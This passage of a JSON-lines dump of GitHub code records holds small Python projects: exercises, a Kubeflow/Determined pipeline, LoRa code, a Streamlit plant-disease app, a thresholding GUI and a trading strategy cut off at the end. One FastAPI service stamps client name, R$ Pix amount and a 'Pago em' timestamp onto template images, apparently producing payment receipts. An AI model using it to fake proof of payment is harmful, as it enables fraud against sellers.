{part_b}')\n","repo_name":"n-parisi/advent-of-code-2021","sub_path":"pkg/08/08.py","file_name":"08.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}{"seq_id":"11621137637","text":"\r\n#1\r\nhari = ['senin','selasa','rabu','kamis','jumat','sabtu','minggu']\r\ntry:\r\n    inputhari = input(\"Masukkan hari : \")\r\n    inputangka = int(input(\"Masukkan jumlah : \"))\r\n    inputhari = inputhari.lower()\r\n    if (inputhari not in hari):\r\n        print(\"Nama hari yang anda masukkan salah\")\r\n    else:\r\n        sisa = inputangka % 7\r\n        if (hari.index(inputhari)+sisa) > 6:\r\n            sisa = sisa + hari.index(inputhari) - 7\r\n        elif (hari.index(inputhari)+sisa < 0):\r\n            sisa = sisa + hari.index(inputhari) + 7\r\n        else:\r\n            sisa = sisa + hari.index(inputhari)\r\n        print(\"Hari ini hari {}. 
{} hari lagi adalah hari {}\".format(inputhari.capitalize(),str(inputangka),hari[sisa].capitalize()))\r\nexcept:\r\n print(\"Jumlah yang anda masukkan salah\")\r\n'''\r\n#2\r\nkalimat = input(\"Masukkan kalimat : \")\r\nfor a in kalimat:\r\n if a in [\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\"]:\r\n print(\"Tidak menerima angka\")\r\n break\r\nelse:\r\n kalimat = kalimat.split()\r\n if kalimat.isalpha():\r\n for a in kalimat:\r\n print(a[::-1], end=\" \")\r\n print(\"\")\r\n else:\r\n\r\n#3\r\nkata1 = input(\"Masukkan kata : \")\r\nfor a in kata1:\r\n if a in [\"0\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\"]:\r\n print(\"Tidak menerima angka\")\r\n break\r\nelse:\r\n if kata1.isalpha():\r\n kata2 = kata1[::-1]\r\n if kata1.lower() == kata2.lower():\r\n print(\"Kata tersebut {} merupakan Palindrome\".format(kata1))\r\n else:\r\n print(\"Kata tersebut {} bukan merupakan Palindrome\".format(kata1))\r\n else:\r\n print(\"Tidak menerima di luar alphabet\")\r\n'''","repo_name":"hendritedjo/python_exercise","sub_path":"exercise-list.py","file_name":"exercise-list.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18467203670","text":"from typing import NamedTuple\n\nimport kfp\nfrom kfp import dsl\nfrom kfp.components import func_to_container_op, InputPath, OutputPath\nimport os\n\n\ndef clone_mlrepo(repo_url: str, branch: str, volume: dsl.PipelineVolume):\n image = \"alpine/git:latest\"\n\n commands = [\n f\"git clone --single-branch --branch {branch} {repo_url} /src/mlrepo/\",\n f\"cd /src/mlrepo/\",\n f\"ls\",\n ]\n\n op = dsl.ContainerOp(\n name=\"git clone\",\n image=image,\n command=[\"sh\"],\n arguments=[\"-c\", \" && \".join(commands)],\n pvolumes={\"/src/\": volume},\n )\n\n return op\n\n\ndef run_det_and_wait(detmaster: str, config: str, context: str) -> int:\n # Submit determined experiment via CLI\n import logging\n import os\n import re\n import subprocess\n\n logging.basicConfig(level=logging.INFO)\n os.environ['DET_MASTER'] = detmaster\n\n repo_dir = \"/src/mlrepo/\"\n\n config = os.path.join(repo_dir, config)\n context = os.path.join(repo_dir, context)\n cmd = [\"det\", \"e\", \"create\", config, context]\n submit = subprocess.run(cmd, capture_output=True)\n output = str(submit.stdout)\n experiment_id = int(re.search(\"Created experiment (\\d+)\", output)[1])\n logging.info(f\"Created Experiment {experiment_id}\")\n\n # Wait for experiment to complete via CLI\n wait = subprocess.run([\"det\", \"e\", \"wait\", str(experiment_id)])\n logging.info(f\"Experiment {experiment_id} completed!\")\n return experiment_id\n\n\nrun_det_and_wait_op = func_to_container_op(\n run_det_and_wait, base_image=\"davidhershey/detcli:1.9\"\n)\n\n\ndef register(detmaster: str, experiment_id: int, model_name: str) -> bool:\n # Submit determined experiment via CLI\n from determined.experimental import Determined\n import os\n\n os.environ['DET_MASTER'] = detmaster\n\n def get_validation_metric(checkpoint):\n metrics = checkpoint.validation['metrics']\n config = checkpoint.experiment_config\n searcher = config['searcher']\n smaller_is_better = bool(searcher['smaller_is_better'])\n metric_name = searcher['metric']\n metric = metrics['validationMetrics'][metric_name]\n return (metric, smaller_is_better)\n\n def is_better(c1, c2):\n m1, smaller_is_better = get_validation_metric(c1)\n m2, _ = get_validation_metric(c2)\n if smaller_is_better and m1 < m2:\n return True\n return 
False\n\n d = Determined()\n checkpoint = d.get_experiment(experiment_id).top_checkpoint()\n try:\n model = d.get_model(model_name)\n except: # Model not yet in registry\n print(f'Registering new Model: {model_name}')\n model = d.create_model(model_name)\n\n print(f'Registering new version: {model_name}')\n model.register_version(checkpoint.uuid)\n return True\n\n\nregister_op = func_to_container_op(\n register, base_image=\"davidhershey/detcli:1.9\"\n)\n\n\ndef create_seldon_op(\n detmaster: str,\n deployment_name: str,\n deployment_namespace: str,\n model_name: str,\n image: str,\n):\n command = [\n \"python\",\n \"create_seldon_deployment.py\",\n f'{deployment_name}',\n f'{deployment_namespace}',\n f'{detmaster}',\n f'{model_name}',\n '--image',\n f'{image}',\n ]\n return dsl.ContainerOp(\n name='Create Seldon Deployment',\n image='davidhershey/seldon-create:1.2',\n command=command,\n file_outputs={\n 'endpoint': '/tmp/endpoint.txt',\n }\n )\n\n\n@func_to_container_op\ndef print_op(message: str):\n \"\"\"Print a message.\"\"\"\n print(message)\n\n\n@dsl.pipeline(\n name=\"Determined Train and Deploy\",\n description=\"Train a model with Determined, deploy the result to Seldon\"\n)\ndef det_train_pipeline(\n detmaster,\n mlrepo=\"https://github.com/determined-ai/determined.git\",\n branch=\"0.13.0\",\n config=\"examples/official/trial/mnist_pytorch/const.yaml\",\n context=\"examples/official/trial/mnist_pytorch/\",\n model_name=\"mnist-prod\",\n deployment_name=\"mnist-prod-kf\",\n deployment_namespace=\"david\",\n image=\"davidhershey/seldon-mnist:1.6\"\n):\n volume_op = dsl.VolumeOp(\n name=\"create pipeline volume\",\n resource_name=\"mlrepo-pvc\",\n modes=[\"ReadWriteOnce\"],\n size=\"3Gi\",\n )\n clone = clone_mlrepo(mlrepo, branch, volume_op.volume)\n train = (\n run_det_and_wait_op(detmaster, config, context)\n .add_pvolumes({\"/src/\": clone.pvolume})\n .after(clone)\n )\n register = (\n register_op(detmaster, train.output, model_name)\n .after(train)\n )\n deploy = create_seldon_op(\n detmaster,\n deployment_name,\n deployment_namespace,\n model_name,\n image,\n ).after(register)\n\n\nif __name__ == \"__main__\":\n # Compiling the pipeline\n kfp.compiler.Compiler().compile(det_train_pipeline, 'train_and_deploy.yaml')\n","repo_name":"determined-ai/works-with-determined","sub_path":"kubeflow_pipelines/create_pipeline.py","file_name":"create_pipeline.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"53"} +{"seq_id":"30111751098","text":"import time\nfrom math import factorial # функция из модуля math\nimport calendar\nfrom datetime import date\n\ndef factorial_recurrent(n): # рекурсивная функция\n if n == 0:\n return 1\n return n * factorial_recurrent(n - 1) \n\ndef factorial_classic(n): # итеративная функция\n f = 1\n for i in range(2, n + 1):\n f *= i\n return f\n\ndef calculate_it(func, *args):\n t1 = time.perf_counter_ns()\n res = func(*args)\n t2 = time.perf_counter_ns()\n return res, t2-t1\n\ndef get_the_fastest_func(funcs, *arg):\n fastest_func = None\n fastest_time = -1\n for func in funcs:\n r, t = calculate_it(func, *arg)\n # show time\n print(func.__name__, t)\n \n if fastest_time < 0 or fastest_time > t:\n fastest_func = func\n fastest_time = t\n return fastest_func\n\ndef for_and_append(): # с использованием цикла for и метода append()\n iterations = 10_000_000\n result = []\n for i in range(iterations):\n result.append(i + 1)\n return result\n\n# с использованием списочного 
выражения\ndef list_comprehension():\n iterations = 10_000_000\n return [i + 1 for i in range(iterations)]\n\n# с использованием цикла for и метода append()\ndef for_and_append_i(iterable):\n result = []\n for elem in iterable:\n result.append(elem)\n return result\n \n# с использованием списочного выражения\ndef list_comprehension_i(iterable):\n return [elem for elem in iterable] \n\n# с использованием встроенной функции list()\ndef list_function_i(iterable):\n return list(iterable) \n\ndef get_all_mondays(year):\n return [date(year, m, w[0]) for m in range(1, 13) for w in calendar.monthcalendar(year, m) if w[0]]\n\ndef get_all_mondays_append(year):\n mondays = []\n for month in range(1, 13):\n for week in calendar.monthcalendar(year, month):\n monday = week[0]\n if monday:\n mondays.append(date(year, month, monday))\n return mondays\n\n\n\"\"\"\nfuncs = (factorial, factorial_recurrent, factorial_classic)\nfastest_func = get_the_fastest_func(funcs, 10)\nprint('The fastest is \\'{}\\''.format(fastest_func.__name__))\n\nfuncs = (for_and_append, list_comprehension)\nfastest_func = get_the_fastest_func(funcs)\nprint('The fastest is \\'{}\\''.format(fastest_func.__name__))\n\nfuncs = (for_and_append_i, list_comprehension_i, list_function_i)\nfastest_func = get_the_fastest_func(funcs, range(1_000_000))\nprint('The fastest is \\'{}\\''.format(fastest_func.__name__))\n\"\"\"\n\nfuncs = (get_all_mondays_append, get_all_mondays)\nfastest_func = get_the_fastest_func(funcs, 3030)\nprint('The fastest is \\'{}\\''.format(fastest_func.__name__))","repo_name":"vepankin/python_stepik","sub_path":"get_fastest_factorial.py","file_name":"get_fastest_factorial.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29638450868","text":"import numpy as np\nimport sys\n\nfrom cure.distance import euclid\n\n\nclass Cluster:\n COUNTER = 0\n\n def __init__(self, X, x_ids, n_reps, a):\n Cluster.COUNTER += 1\n self.id = Cluster.COUNTER\n self.X = np.array(X)\n self.n_samples, self.n_features = self.X.shape\n self.x_ids = x_ids\n self.n_reps = n_reps\n self.a = a\n self.mean = self.X.sum(axis=0)/(self.n_samples)\n self.reps = self.assign_reps()\n self.closest = None\n self.closest_distance = sys.maxsize\n\n def assign_reps(self):\n print('Определим точки-представители')\n if self.n_samples <= self.n_reps:\n print(f'Требуемое кол-во представителей не привышает множество точек кластера {self.id}.',\n f'Значит все точки - представители:', np.around(self.X))\n return self.X\n tmp_set = set()\n reps = []\n print(f'Всего в классе {len(self.X)} точек > {self.n_reps}.')\n print('Значит нужно вычислить точек-представителей для кластера', self.id)\n for i in range(self.n_reps):\n max_dist = 0\n for j in range(self.n_samples):\n if i == 0:\n min_dist = euclid(self.X[j], self.mean)\n else:\n min_dist = euclid(reps, self.X[j], axis=1).min()\n if min_dist >= max_dist:\n max_dist = min_dist\n max_point = j\n print('Найдена точка-представитель:', np.around(self.X[max_point]))\n if max_point not in tmp_set:\n tmp_set.add(max_point)\n if reps is not None:\n point = self.X[max_point]\n reps.append(point + self.a * (self.mean - point))\n else:\n point = self.X[max_point]\n reps = [point + self.a * (self.mean - point)]\n print('Точки-представитель',\n np.around(point), 'сдвигаем к центру:')\n print(f'{point} + {self.a} * ({np.around(self.mean, 5)} - {point})',\n reps[-1], sep=' = ')\n return np.array(reps)\n\n def distance_from_point(self, 
point):\n return euclid(self.reps, point, axis=1).min()\n","repo_name":"ankkarp/psppr2","sub_path":"cure/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19273985885","text":"# encoding: utf-8\n\nimport logging\n\nLOG_FILE = 'authserv.log'\nLOG_FMT = '%(asctime)s %(name)-15s %(levelname)-7s %(message)s'\nLOG_DATEFMT = '%y-%m-%d %H:%M:%S'\n\ndef setupLogging(consolelevel=logging.INFO, logfile=LOG_FILE):\n '''\n sets up the logger such that:\n debug+ -> file\n info+ -> console\n '''\n logging.basicConfig(\n level = logging.DEBUG,\n format = LOG_FMT,\n datefmt = LOG_DATEFMT,\n filename = logfile,\n filemode = 'w'\n )\n # log to console\n consolelog = logging.StreamHandler()\n consolelog.setLevel(consolelevel)\n consolelog.setFormatter(logging.Formatter(LOG_FMT, LOG_DATEFMT))\n logging.getLogger().addHandler(consolelog)","repo_name":"mcnz/authserv","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38714747628","text":"from pathlib import Path\nfrom pydantic import BaseModel\n\nimport os\nimport cv2\nfrom numpy import ndarray\nfrom base64 import b64encode\n\nimport asyncio\nfrom io import BytesIO\nfrom datetime import datetime\n\nfrom functools import wraps\nfrom typing import NamedTuple, Callable, Coroutine, Tuple, Dict, Any\n\nfrom fastapi.responses import Response\nfrom fastapi import FastAPI, HTTPException, Depends\n\napplication = FastAPI()\n\nBASE_DIR = Path(__file__).parent\nIMAGES_PATH = BASE_DIR / 'images'\n\nif not os.path.exists(IMAGES_PATH):\n os.mkdir(IMAGES_PATH)\n\n\nclass ImageDoesNotExistException(Exception):\n pass\n\n\nclass ImageCannotBeSavedException(Exception):\n pass\n\n\ndef sync_to_async(function: Callable) -> Coroutine:\n\n @wraps(function)\n async def wrapper(*args: Tuple, **kwargs: Dict) -> Any:\n return await asyncio.to_thread(function, *args, **kwargs)\n\n return wrapper\n\n\nclass GenerateImageInput(BaseModel):\n image_name: str\n client_name: str\n pix: str\n\n\ndef get_image_path(image_name: str) -> str:\n image_name = image_name.lower()\n\n for image in os.listdir(IMAGES_PATH):\n if image.lower().startswith(image_name):\n return str(IMAGES_PATH / image)\n\n raise ImageDoesNotExistException(f\"{image_name} does not exist\")\n\n\nclass DataToPutOnImage(NamedTuple):\n text: str\n position: Tuple\n size: float\n\n\ndef put_label_on_image(\n image: ndarray,\n data_to_put_on_image: DataToPutOnImage\n) -> None:\n\n cv2.putText(\n image,\n data_to_put_on_image.text,\n data_to_put_on_image.position,\n cv2.FONT_HERSHEY_DUPLEX,\n data_to_put_on_image.size,\n (0, 0, 0),\n 2\n )\n\n\ndef put_labels_on_image(\n image: ndarray,\n image_data: GenerateImageInput\n) -> None:\n\n put_label_on_image(image, DataToPutOnImage(\n text=f\"Cliente: {image_data.client_name}\".upper(),\n position=(10, 410),\n size=0.8\n ))\n\n put_label_on_image(image, DataToPutOnImage(\n text=image_data.pix,\n position=(60, 500),\n size=3\n ))\n\n put_label_on_image(image, DataToPutOnImage(\n text='R$',\n position=(10, 500),\n size=1\n ))\n\n put_label_on_image(image, DataToPutOnImage(\n text=datetime.now().strftime(\"Pago em %H:%M:%S %d/%m/%Y\"),\n position=(10, 540),\n size=0.75\n ))\n\n\ndef write_image_to_buffer(image: ndarray) -> BytesIO:\n is_success, encoded_image = cv2.imencode('.jpg', image)\n\n if is_success:\n 
return BytesIO(encoded_image)\n\n raise ImageCannotBeSavedException()\n\n\ndef convert_buffer_to_base64(buffer: BytesIO) -> str:\n return b64encode(buffer.getvalue()).decode('utf-8')\n\n\n@sync_to_async\ndef generate_image_in_base64(image_data: GenerateImageInput) -> BytesIO:\n image = cv2.imread(get_image_path(image_data.image_name))\n put_labels_on_image(image, image_data)\n return convert_buffer_to_base64(write_image_to_buffer(image))\n\n\n@application.get('/generate_image/')\nasync def generate_image_controller(\n image_data: GenerateImageInput = Depends()\n) -> Response:\n\n try:\n base64_image = await generate_image_in_base64(image_data)\n except (ImageDoesNotExistException, ImageCannotBeSavedException) as error:\n raise HTTPException(status_code=400, detail=str(error))\n except Exception as error:\n raise HTTPException(\n status_code=409,\n detail=f\"Unexpected error: {str(error)}\"\n )\n else:\n return Response(content=base64_image)\n","repo_name":"SarahLightBourne/image-generator","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31852506525","text":"from network import LoRa\nimport socket\nimport time\nimport ubinascii\nimport pycom\nclass Lora:\n # Update these!\n APP_KEY = \"APP KEY\" # Application key from the things network SAM\n APP_EUI = \"APP EUI\" # The EUI for the app SAM\n DEV_EUI = \"DEV EUI\"\n JOIN_TIMEOUT = 30 # passed to the LoRaWAN join function.\n \n\n def connect(self):\n # config = config_template()\n pycom.heartbeat(False)\n pycom.rgbled(0xf00000) # Make the LED red\n print(\"Connecting to Lora\")\n\n # United States = LoRa.US915\n self.lora = LoRa(mode=LoRa.LORAWAN, region=LoRa.US915, device_class=LoRa.CLASS_A)\n\n # Setting up channels for sub-band 2\n self.lora.add_channel(index=8, frequency=903900000, dr_min=0, dr_max=3)\n self.lora.add_channel(index=9, frequency=904100000, dr_min=0, dr_max=3)\n self.lora.add_channel(index=10, frequency=904300000, dr_min=0, dr_max=3)\n self.lora.add_channel(index=11, frequency=904500000, dr_min=0, dr_max=3)\n self.lora.add_channel(index=12, frequency=904700000, dr_min=0, dr_max=3)\n self.lora.add_channel(index=13, frequency=904900000, dr_min=0, dr_max=3)\n self.lora.add_channel(index=14, frequency=905100000, dr_min=0, dr_max=3)\n self.lora.add_channel(index=15, frequency=905300000, dr_min=0, dr_max=3)\n # Remove all other channels\n for index in range(0, 7):\n self.lora.remove_channel(index)\n for index in range(16, 72):\n self.lora.remove_channel(index)\n\n # create an OTAA authentication parameters\n app_eui = ubinascii.unhexlify(self.APP_EUI)\n app_key = ubinascii.unhexlify(self.APP_KEY)\n dev_eui = ubinascii.unhexlify(self.DEV_EUI)\n # join a network using OTAA (Over the Air Activation)\n self.lora.join(activation=LoRa.OTAA, auth=(dev_eui, app_eui, app_key), timeout=0)\n\n # wait until the module has joined the network\n count = 0 \n while not self.lora.has_joined():\n time.sleep(2.5)\n print('Not yet...'+ str(count))\n count += 1\n\n pycom.rgbled(0x008000) # Make the LED green\n print(\"Joined Lora Network\")\n \n def create_socket(self):\n s = socket.socket(socket.AF_LORA, socket.SOCK_RAW)\n\n # set the LoRaWAN data rate\n s.setsockopt(socket.SOL_LORA, socket.SO_DR, 3)\n\n def send(self, msg):\n s = socket.socket(socket.AF_LORA, socket.SOCK_RAW)\n s.setsockopt(socket.SOL_LORA, socket.SO_DR, 3)\n s.setblocking(True)\n # msg_bytes = bytearray()\n # msg_bytes = 
msg.encode()\n s.send(msg.encode())\n s.close()\n\n def getStatus(self):\n if self.lora.has_joined():\n return 0\n return 1\n","repo_name":"samlarsen18/lora_project","sub_path":"pytrack_flash/lora_functions.py","file_name":"lora_functions.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38271892935","text":"'''\nStandard raster plot\n'''\n\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nfrom jaratoolbox import settings\nfrom jaratoolbox import celldatabase\nfrom jaratoolbox import behavioranalysis\nfrom jaratoolbox import spikesanalysis\nfrom jaratoolbox import extraplots\nfrom jaratoolbox import ephyscore\nfrom jaratoolbox import spikesorting\nimport studyparams\n\ndbPath = os.path.join(settings.FIGURES_DATA_PATH, studyparams.STUDY_NAME)\ndbFilename = os.path.join(dbPath,'celldb_{}.h5'.format(studyparams.STUDY_NAME))\n\nfigFormat = 'png'\noutputDir = os.path.join(settings.FIGURES_DATA_PATH, studyparams.STUDY_NAME,'reports')\n\n# -- Load the database of cells --\ncelldb = celldatabase.load_hdf(dbFilename)\nnumber_of_clusters = len(celldb) - 1\n\nfor indRow,dbRow in celldb[266:267].iterrows():\n oneCell = ephyscore.Cell(dbRow)\n timeRange = [-0.1, 0.4] # In seconds\n\n ephysDataStd, bdataStd = oneCell.load('standard')\n spikeTimesStd = ephysDataStd['spikeTimes']\n eventOnsetTimesStd = ephysDataStd['events']['stimOn']\n (spikeTimesFromEventOnsetStd,trialIndexForEachSpikeStd,indexLimitsEachTrialStd) = \\\n spikesanalysis.eventlocked_spiketimes(spikeTimesStd, eventOnsetTimesStd, timeRange)\n\n frequenciesEachTrialStd = bdataStd['currentFreq']\n numberOfTrialsStd = len(frequenciesEachTrialStd)\n arrayOfFrequenciesStd = np.unique(bdataStd['currentFreq'])\n arrayOfFrequenciesStdkHz = arrayOfFrequenciesStd/1000\n labelsForYaxis = ['%.1f' % f for f in arrayOfFrequenciesStdkHz]\n trialsEachCondStd = behavioranalysis.find_trials_each_type(frequenciesEachTrialStd,\n arrayOfFrequenciesStd)\n\n extraplots.raster_plot(spikeTimesFromEventOnsetStd,indexLimitsEachTrialStd,\n timeRange, trialsEachCondStd, labels=labelsForYaxis)\n plt.xticks(fontsize=16)\n plt.yticks(fontsize=16)\n plt.xlabel('Time from event onset [s]', fontsize=18)\n plt.ylabel('Frequency [kHz]', fontsize=18)\n plt.title('Standard Sequence ({} Trials)'.format(numberOfTrialsStd))\n\n '''\n Saving the figure --------------------------------------------------------------\n '''\n figFilename ='{}_{}_{}um_T{}_c{}_stdraster.{}'.format(dbRow['subject'],dbRow['date'],dbRow['depth'],\n dbRow['tetrode'],dbRow['cluster'],figFormat)\n figFullpath = os.path.join(outputDir,figFilename)\n plt.savefig(figFullpath,format=figFormat)\n plt.gcf().set_size_inches([6,4])\n\n plt.tight_layout()\n plt.show()\n","repo_name":"sjara/jaratest","sub_path":"beth/ssa/graph_stdraster.py","file_name":"graph_stdraster.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"73522934247","text":"import cv2\nimport os\nimport json\nimport numpy as np\nfrom PIL import Image\n\nclass np_im(object):\n def __init__(self, outputs, PATH_im, filename):\n self.outputs=outputs\n self.PATH_im=PATH_im\n self.filename=filename\n \n def create(self):\n l=self.outputs['instances']\n for i in range(len(l)):\n a=l[i].get_fields()\n q=a['pred_masks']\n q=q.tolist()\n \n for j in range(len(q[0])):\n for k in range(len(q[0][j])):\n if 
q[0][j][k]==True:\n                        q[0][j][k]=255\n                    if q[0][j][k]==False:\n                        q[0][j][k]=0 \n                \n                q[0][j]=np.array(q[0][j])\n            \n            q[0] = np.array(q[0], dtype=np.uint8)\n            data = q[0]\n            img = Image.fromarray(data)\n            img.save(os.path.join(self.PATH_im,str(self.filename)+'_instance_'+str(i)+'.png'))\n            img.show()\n        \n        \n","repo_name":"Has970211/Object-detection","sub_path":"ObjectDetection_detectron2/Numpy_image/nmpy_img.py","file_name":"nmpy_img.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}{"seq_id":"18068473143","text":"# import the necessary packages\n# To access the GUI Functionality\nfrom tkinter import *\nfrom tkinter import filedialog\n# PIL(photo imaging Library) allows displaying JPEG/JPG and PNG\nfrom PIL import Image\nfrom PIL import ImageTk\n# To use OpenCV\nimport cv2\n\n\ndef adjust_size(image):\n    \"\"\"Downscaling the image while preserving the Aspect Ratio\"\"\"\n    global width, height\n    scale_percent = 90 # percent of original size\n    width = int(image.shape[1] * scale_percent / 100)\n    height = int(image.shape[0] * scale_percent / 100)\n\n\ndef display_image(image):\n    \"\"\"Performs the necessary pre-processing to display the image with Tkinter\"\"\"\n    global image_panel\n\n    image = Image.fromarray(image) # convert the images to PIL format\n    image = ImageTk.PhotoImage(image) # and then to ImageTk format\n\n    if image_panel is None: # if the panels are None, initialize them\n        image_panel = Label(image=image)\n        image_panel.image = image # prevent Python’s garbage collection routines from deleting the image\n        image_panel.pack()\n    else: # otherwise, update the image panels\n        image_panel.configure(image=image) # update the image label\n        image_panel.image = image\n        image_panel.pack()\n\n\ndef select_image():\n    \"\"\"Load and display the RGB image to be fitted on the screen\"\"\"\n    # grab a reference to the image path, width and height\n    global path, width, height\n    # open a file chooser dialog and allow the user to select an input image\n    path = filedialog.askopenfilename()\n\n    if len(path) > 0: # ensure a file path was selected\n        image = cv2.imread(path) # load the image from path\n        height, width = image.shape[:2] # image height and width\n        while height > 550 or width > 1024:\n            adjust_size(image) # adjust the resolution to fit the screen\n            image = cv2.resize(image, (width, height)) # shrink before re-checking, so the loop terminates\n        # PIL/Pillow represents images in RGB order\n        image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n        display_image(image)\n\n\ndef threshold_slider(*args):\n    \"\"\"Updates the binary threshold image dynamically based on the slider value\"\"\"\n    if len(path) > 0:\n        image = cv2.imread(path)\n        image = cv2.resize(image, (width, height))\n        image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n        gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n\n        # Reads the current threshold value from slider\n        th_val = slider.get()\n        # applying binary threshold on the grayscale image\n        # all pixel values above threshold will be set to 255(white)\n        retval, th_image = cv2.threshold(gray, th_val, 255, cv2.THRESH_BINARY)\n        display_image(th_image)\n\n\ndef show_grayscale():\n    \"\"\"Displays the grayscale image on screen when user presses the corresponding button\"\"\"\n    if len(path) > 0:\n        image = cv2.imread(path)\n        image = cv2.resize(image, (width, height))\n        image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n        gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n\n        display_image(gray)\n\n\n# Global Variables\nimage_panel, path, width, height = None, '', 0, 0\n\n# initialize 
the main window\nroot = Tk()\nroot.title(\"Adaptive Binary Thresholding\")\n\n# Image Selection button widget\nselect_btn = Button(root, text=\"Select an image\", command=select_image)\nselect_btn.pack(side=\"bottom\")\n\n# Display Grayscale image button widget\ngray_button = Button(root, text=\"Show Grayscale\", command=show_grayscale)\ngray_button.pack()\n\n# Description text of binary threshold label widget\nlabel = Label(root, text=\"Move the scale to adjust the binary threshold\")\nlabel.pack()\n\n# Adaptive Threshold scale widget\nslider = Scale(root, from_=0, to=255, length=400, resolution=1, orient=HORIZONTAL, command=threshold_slider)\nslider.set(127)\nslider.pack()\n\n# kick off the GUI\nroot.mainloop()\n","repo_name":"itkhanz/Binary-Threshold-Tool","sub_path":"assignment.py","file_name":"assignment.py","file_ext":"py","file_size_in_byte":3879,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21391306339","text":"\"\"\"Test handlebars else tag.\n\npoetry run pytest tests/test_handlebars/test_else.py\n\"\"\"\nimport pytest\n\nfrom src.djlint.reformat import formatter\nfrom tests.conftest import printer\n\ntest_data = [\n pytest.param(\n (\"{{^}}\"),\n (\"{{^}}\\n\"),\n id=\"else_tag\",\n ),\n]\n\n\n@pytest.mark.parametrize((\"source\", \"expected\"), test_data)\ndef test_base(source, expected, handlebars_config):\n output = formatter(handlebars_config, source)\n\n printer(expected, source, output)\n assert expected == output\n","repo_name":"Riverside-Healthcare/djLint","sub_path":"tests/test_handlebars/test_else.py","file_name":"test_else.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":488,"dataset":"github-code","pt":"53"} +{"seq_id":"42407068598","text":"import streamlit as st\nimport tensorflow as tf\nfrom io import BytesIO\nfrom PIL import Image\nimport numpy as np\nfrom streamlit_lottie import st_lottie\nimport requests\n\nst.set_page_config(page_title='Leaf Disease Detection', page_icon=':leaves:')\n\n# Load the pre-trained model\nmodel=tf.keras.models.load_model('C:\\\\Users\\\\digital\\\\Desktop\\\\training1\\\\app_model (1).h5')\n\nCLASS_NAMES = [\n 'Potato_Early_blight',\n 'Potato_late_blight',\n 'Potato_healthy'\n ]\n\n# Dictionary of diseases and their remedies\nremedies = {\n \"Potato_Early_blight\": \"Remove infected leaves and use copper fungicides. Apply mulch to keep the soil moisture consistent.\",\n \"Potato_late_blight\": \"Copper-based fungicides along with organic remedies like neem oil and garlic extracts can also be used to control the spread of late blight in potato plants\",\n \"Potato_healthy\": \"Your leaf looks healthy! Keep up the good work!\"\n \n}\n\n\n# Define the Streamlit app\nst.title(\"Protect your plants, the smart way!! 
\")\n# Upload the image\nupload_file = st.file_uploader('Upload a image', type= [\"png\", \"jpg\",\"jpeg\"])\n\n\n\n\n\nif upload_file is not None:\n \n image = Image.open(upload_file)\n #image =image.resize((180, 180), resample=Image.BILINEAR)\n st.image(image, caption='Uploaded Image.', use_column_width=True)\n \n #preprocess the image\n img = np.array(image.resize((256, 256)))\n img = np.expand_dims(img, axis=0)\n \n \n\n #make preduction using the model\n predictions = model.predict(img)[0]\n predicted_class = np.argmax(predictions)\n\n\n #get the predicted disease and its corresponding remedies\n predicted_disease = list(remedies.keys())[predicted_class]\n prediction_confidence = np.max(predictions)\n predicted_remedy = remedies[predicted_disease]\n\n\n\n #show the predicted disease and remedies\n st.write(\"The predicted disease is: \" + predicted_disease)\n st.write(\"Confidence:\", prediction_confidence)\n st.write(\"The remedy for this disease is: \" + predicted_remedy)\n\n\n \n \n\n \n\n\n \n \n\n\n\n \n\n\n \n ","repo_name":"ssom01-github/Leaf_diagnosis","sub_path":"Multipages/pages/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73896311208","text":"# --- Do not remove these libs ---\nfrom freqtrade.strategy.interface import IStrategy\nfrom pandas import DataFrame\nimport talib.abstract as ta\n\n\n# --------------------------------\n\n\nclass adx_opt_strat(IStrategy):\n \"\"\"\n author@: Gert Wohlgemuth\n converted from:\n https://github.com/sthewissen/Mynt/blob/master/src/Mynt.Core/Strategies/AdxMomentum.cs\n \"\"\"\n\n # Minimal ROI designed for the strategy.\n # adjust based on market conditions. We would recommend to keep it low for quick turn arounds\n # This attribute will be overridden if the config file contains \"minimal_roi\"\n minimal_roi = {\n \"0\": 0.0692,\n \"7\": 0.02682,\n \"10\": 0.00771,\n \"32\": 0\n }\n\n # Optimal stoploss designed for the strategy\n stoploss = -0.32766\n\n # Trailing stoploss\n trailing_stop = True\n trailing_only_offset_is_reached = True\n trailing_stop_positive = 